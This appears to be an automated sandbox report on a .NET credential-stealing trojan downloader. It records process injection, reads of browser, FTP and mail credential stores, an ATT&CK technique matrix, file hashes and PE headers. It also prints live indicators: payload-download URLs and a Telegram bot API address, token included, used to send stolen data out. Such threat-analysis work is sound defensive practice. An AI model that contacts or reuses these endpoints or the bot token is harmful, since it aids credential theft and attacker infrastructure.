                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 438000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 43A000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 968008
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC5594 GetUserNameW,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe PID: 2280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe PID: 2280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                Path Interception311
                Process Injection
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Web Service
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                114
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information
                1
                Credentials in Registry
                111
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration11
                Encrypted Channel
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object Model1
                Input Capture
                Scheduled Transfer3
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets131
                Virtualization/Sandbox Evasion
                SSHKeyloggingData Transfer Size Limits4
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common131
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items311
                Process Injection
                DCSync1
                System Owner/User Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe100%Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                3.0.cvtres.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                3.0.cvtres.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                3.2.cvtres.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                3.0.cvtres.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                3.0.cvtres.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                3.0.cvtres.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                https://sebastiank.tk/devv/POPO.txt3%VirustotalBrowse
                https://sebastiank.tk/devv/POPO.txt0%Avira URL Cloudsafe
                https://sebastiank.tk0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://FU6DgqPJnyDGd.net0%Avira URL Cloudsafe
                https://sebastiank.tk/devv/DLLL.txt0%Avira URL Cloudsafe
                http://sebastiank.tk0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                http://UEYOBD.com0%Avira URL Cloudsafe
                https://sebastiank.tk40%Avira URL Cloudsafe
                https://sebastiank.tkD80%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                sebastiank.tk
                162.240.35.239
                truefalse
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://sebastiank.tk/devv/POPO.txtfalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://sebastiank.tk/devv/DLLL.txtfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocumentfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1cvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNScvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.org4cvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.orgcvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://sebastiank.tkSecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hacvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          high
                          https://FU6DgqPJnyDGd.netcvtres.exe, 00000003.00000002.503667667.0000000006CCD000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://sebastiank.tkSecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245047543.0000000002610000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://api.telegram.orgcvtres.exe, 00000003.00000002.503890363.0000000006D20000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipSecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://UEYOBD.comcvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocumentdocument-----cvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://sebastiank.tk4SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://sebastiank.tkD8SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245081518.0000000002630000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                149.154.167.220
                                api.telegram.orgUnited Kingdom
                                62041TELEGRAMRUfalse
                                162.240.35.239
                                sebastiank.tkUnited States
                                46606UNIFIEDLAYER-AS-1USfalse
                                Joe Sandbox Version:35.0.0 Citrine
                                Analysis ID:680350
                                Start date and time: 08/08/202212:53:082022-08-08 12:53:08 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 7m 49s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.27473 (renamed file extension from 27473 to exe)
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:27
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@3/1@2/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 98%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                12:54:15API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe modified
                                12:54:28API Interceptor730x Sleep call for process: cvtres.exe modified
                                No context
                                No context
                                No context
                                No context
                                No context
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):847
                                Entropy (8bit):5.35816127824051
                                Encrypted:false
                                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                                MD5:31E089E21A2AEB18A2A23D3E61EB2167
                                SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                                SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                                SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):5.416536296760798
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                File size:246304
                                MD5:36c6dddaa5fb7f14e221c8fa3bda0d92
                                SHA1:11914d1b9eceea7365aa1195777193e8b7686bc9
                                SHA256:fbeb5eff4ac0eaeeba51f60586ef6279f4c483c14803f293dbc513c8a032f60e
                                SHA512:a66f4c78c609cf4c7d58d33bff7a106a9fb77a66c33cb7e420f8ee67c634c2752b43f72200d72f513629ba3df32191efea6400bd21a20a45b21fd201e154a931
                                SSDEEP:1536:8UyE4Z7HDAZeLFuTOG/Hrqj71ZjhGIBOrPaOYdSkjiRNqOP3t2:ME4iUub/Hrq371hEbaFSkjiRrPd
                                TLSH:3834BB74A1F12ACEE896CEB29E60E919FFE31C519A45820FD03235F6553BB85C6041FE
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.............N.... ... ....@.. .............................._h....`................................
                                Icon Hash:90828c8c8c8a9010
                                Entrypoint:0x41004e
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x62F0C585 [Mon Aug 8 08:12:53 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Signature Valid:false
                                Signature Issuer:CN=DigiCert High Assurance Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                Signature Validation Error:The digital signature of the object did not verify
                                Error Number:-2146869232
                                Not Before, Not After
                                • 10/30/2013 1:00:00 AM 1/4/2017 1:00:00 PM
                                Subject Chain
                                • CN=Wen Jia Liu, O=Wen Jia Liu, L=Sydney, S=New South Wales, C=AU
                                Version:3
                                Thumbprint MD5:FB7AAB26B203432685FBC0FF17F24045
                                Thumbprint SHA-1:32387AEC09EB287F202E98398189B460F4C61A0D
                                Thumbprint SHA-256:E0E85619EEF45FCE4421E4BA581060E43BBBF25911CD757DD081DA425DD1DB51
                                Serial:0FF1EF66BD621C65B74B4DE41425717F
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xfffc0x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x2a0c4.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x388000x3a20
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0xffb40x1c.text
